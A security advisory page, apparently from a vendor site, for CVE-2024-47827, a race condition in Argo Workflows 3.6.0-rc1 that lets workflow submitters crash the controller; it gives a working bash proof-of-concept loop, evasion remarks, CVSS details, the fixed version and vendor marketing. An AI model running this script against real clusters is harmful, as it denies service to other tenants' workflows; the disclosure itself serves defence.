Summary
Due to a race condition in a global variable, the argo workflows controller can be made to crash on-command by any user with access to execute a workflow.
This was resolved by https://github.com/argoproj/argo-workflows/pull/13641
Details
These two lines introduce a data race in the underlying SPDY implementation of the Kubernetes API client. If a second request is made before the first completes, it results in a panic due to a null pointer.
- https://github.com/argoproj/argo-workflows/blob/ce7f9bfb9b45f009b3e85fabe5e6410de23c7c5f/workflow/metrics/metrics_k8s_request.go#L49
- https://github.com/argoproj/argo-workflows/blob/ce7f9bfb9b45f009b3e85fabe5e6410de23c7c5f/workflow/metrics/metrics_k8s_request.go#L75
This appears to have been added in this commit https://github.com/argoproj/argo-workflows/commit/9756babd0ed589d1cd24592f05725f748f74130b / #13265 / v3.6.0-rc1
PoC
With the KUBECONFIG variable set to an appropriate file with create permissions for the Workflow kind, execute the following bash script:
#!/bin/bash -xeu
while true ; do
name=$(
{ argo submit /dev/stdin <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: curl-
spec:
entrypoint: main
templates:
- name: main
dag:
tasks:
- name: no-op
template: no-op
withSequence:
count: 3
- name: no-op
daemon: true
container:
image: alpine:3.13
command: [sleep, infinity]
EOF
} | head -n1 | awk '{ print $2 }'
)
( sleep 30; argo terminate $name ) &
sleep 15
done
This script creates, and subsequently cleans up, multiple daemon pods in rapid succession. Each pod cleanup involves executing a kill instruction using the Kubernetes exec API, triggering the conditions for the panic. This can be seen when the tests mark the pods as complete, but the workflow itself never completes. Observing the controller logs when this happens shows the panic and restart of the controller every few seconds. In a setup with exponential backoff (e.g. a Kubernetes Pod) this is enough to reliably cause crashes enough to extend this backoff significantly and leave other workflows stalled.
Because the restarted controller believes it has sent the kill signal, it will wait indefinitely for the pod to terminate, which it never will, so the attack must constantly garbage-collect its own workflows with the argo terminate command, otherwise the maximum concurrently running workflows will be reached. A more sophisticated attack could detect when the workflow has been signaled to clean up and terminate it then instead of relying on a simple timer.
Impact
A malicious user with access to create workflows can continually submit workflows that do nothing except create and then clean up multiple daemon pods, resulting in a crash-loop that prevents other users' workflows from running. This can be done with only a handful of pods and very little cpu and memory, meaning typical multi-tenant Kubernetes controls such as Pod count and resource quotas are not effective at preventing it.
Because the panic log does not in any way suggest that the issue has anything to do with the daemon pods, and an attacker could easily disguise these daemon pods as part of a genuine workflow, it would be difficult for administrators to discover the root cause of the DoS and the individuals responsible to remove their access.
Multiple concurrent operations access a shared resource without proper synchronization, producing unpredictable results depending on timing. Typical impact: TOCTOU exploits, data corruption, or privilege escalation.
CVE-2024-47827 has a CVSS score of 5.7 (Medium). The vector is reachable from an adjacent network, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.6.0-rc2); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2024-47827? CVE-2024-47827 is a medium-severity race condition vulnerability in github.com/argoproj/argo-workflows/v3 (go), affecting versions = 3.6.0-rc1. It is fixed in 3.6.0-rc2. Multiple concurrent operations access a shared resource without proper synchronization, producing unpredictable results depending on timing.
- How severe is CVE-2024-47827? CVE-2024-47827 has a CVSS score of 5.7 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/argoproj/argo-workflows/v3 are affected by CVE-2024-47827? github.com/argoproj/argo-workflows/v3 (go) versions = 3.6.0-rc1 is affected.
- Is there a fix for CVE-2024-47827? Yes. CVE-2024-47827 is fixed in 3.6.0-rc2. Upgrade to this version or later.
- Is CVE-2024-47827 exploitable, and should I be worried? Whether CVE-2024-47827 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2024-47827 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2024-47827? Upgrade
github.com/argoproj/argo-workflows/v3to 3.6.0-rc2 or later.